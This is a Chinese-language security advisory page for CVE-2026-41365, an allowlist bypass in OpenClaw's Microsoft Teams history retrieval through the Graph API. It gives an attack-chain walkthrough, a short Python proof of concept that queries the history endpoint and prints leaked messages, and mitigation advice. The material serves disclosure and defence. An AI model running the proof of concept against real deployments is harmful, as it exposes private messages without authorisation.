IPBUF安全漏洞报告
English
CVE-2026-41365 CVSS 5.4 中危

CVE-2026-41365 OpenClaw白名单绕过漏洞

披露日期: 2026-04-28
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-41365
漏洞类型
权限绕过
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

权限绕过OpenClawAPI安全信息泄露逻辑漏洞

漏洞概述

OpenClaw 2026.3.31之前的版本存在发送方白名单绕过漏洞。由于系统在通过Microsoft Graph API获取MS Teams线程历史记录时未能正确应用过滤规则,攻击者可以检索到本应被发送方白名单拦截的私有消息,导致访问控制机制失效并引发信息泄露。

技术细节

该漏洞源于OpenClaw应用程序在处理Microsoft Graph API数据时的逻辑缺陷。通常,OpenClaw会根据预设的发送方白名单对实时或传入消息进行过滤,以阻止非授权发送者的内容。然而,当系统通过Graph API拉取Teams线程的历史记录时,后端代码未对这一数据源执行相同级别的白名单校验。攻击者只需拥有低权限账户,即可调用受影响的功能接口。由于API响应返回了未经过滤的历史数据,攻击者能够绕过前端或业务层的限制,直接读取原本应被拦截的敏感消息。这表明应用在不同数据获取路径(实时流与历史查询)上存在安全策略不一致的问题。

攻击链分析

STEP 1
步骤1:获取访问权限
攻击者注册或通过其他方式获取OpenClaw平台的低权限用户账户。
STEP 2
步骤2:访问历史记录接口
攻击者登录系统,导航至MS Teams集成功能,并触发“获取线程历史记录”的操作。
STEP 3
步骤3:利用漏洞
OpenClaw后端通过Microsoft Graph API请求数据,但在返回给前端前未应用发送方白名单过滤。
STEP 4
步骤4:信息泄露
攻击者收到包含非白名单发送者的历史消息列表,成功绕过安全限制读取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC: Demonstrating the retrieval of non-whitelisted messages # Target: OpenClaw < 2026.3.31 import requests def exploit_openclaw(target_url, auth_token): """ This script simulates fetching MS Teams thread history via the vulnerable endpoint. Due to the lack of allowlist enforcement on history data, messages from blocked senders are returned. """ headers = { "Authorization": f"Bearer {auth_token}", "Content-Type": "application/json" } # Endpoint to fetch thread history (Vulnerable path) history_endpoint = f"{target_url}/api/teams/history" try: response = requests.get(history_endpoint, headers=headers) if response.status_code == 200: data = response.json() print("[+] Successfully retrieved thread history.") # Iterate through messages to identify leaked data for message in data.get('messages', []): sender = message.get('sender_email') content = message.get('body') # In a secure scenario, '[email protected]' should not appear print(f"[!] Leaked message from: {sender}") print(f" Content: {content}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {str(e)}") # Usage # exploit_openclaw("https://target-openclaw-instance", "USER_TOKEN")

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施
如果无法立即升级,建议暂时禁用OpenClaw中的MS Teams线程历史记录同步功能。同时,管理员应在Microsoft Teams端实施更严格的DLP(数据防泄露)策略,以防止敏感信息被未授权的第三方应用通过API批量抓取。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表